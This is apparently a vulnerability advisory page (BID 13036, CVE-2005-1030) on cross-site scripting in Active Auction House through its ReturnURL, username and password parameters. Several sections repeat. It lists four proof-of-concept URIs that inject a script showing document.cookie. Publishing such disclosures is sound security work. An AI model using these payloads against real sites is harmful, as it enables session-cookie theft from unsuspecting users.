Active Auction House ReturnURL Multiple Cross-Site Scripting Vulnerabilities
BID:13036
Info
Active Auction House ReturnURL Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 13036 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-1030 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 06 2005 12:00AM |
| Updated: | Jul 12 2009 11:57AM |
| Credit: | Discovery of this vulnerability is credited to dcrab <[email protected]>. |
| Vulnerable: |
Active Web Softwares Active Auction House |
| Not Vulnerable: | |
Discussion
Active Auction House ReturnURL Multiple Cross-Site Scripting Vulnerabilities
Active Auction House is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Active Auction House is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
Active Auction House ReturnURL Multiple Cross-Site Scripting Vulnerabilities
No exploit is required.
The following proof of concept URI's are available:
http://www.example.com/activeauctionsuperstore/?ReturnURL='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&username=dcrab&password=
http://www.example.com/activeauctionsuperstore/?ReturnURL=start.asp&username=dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/activeauctionsuperstore/?ReturnURL=start.asp&username='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=
http://www.example.com/activeauctionsuperstore/account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
No exploit is required.
The following proof of concept URI's are available:
http://www.example.com/activeauctionsuperstore/?ReturnURL='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&username=dcrab&password=
http://www.example.com/activeauctionsuperstore/?ReturnURL=start.asp&username=dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/activeauctionsuperstore/?ReturnURL=start.asp&username='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=
http://www.example.com/activeauctionsuperstore/account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Solution / Fix
Active Auction House ReturnURL Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Active Auction House ReturnURL Multiple Cross-Site Scripting Vulnerabilities
References:
References:
- Active Auction House Homepage (Active Web Softwares)
- Active Auction House has multiple Sql injection, error and XSS vulnerabilities (dcrab
)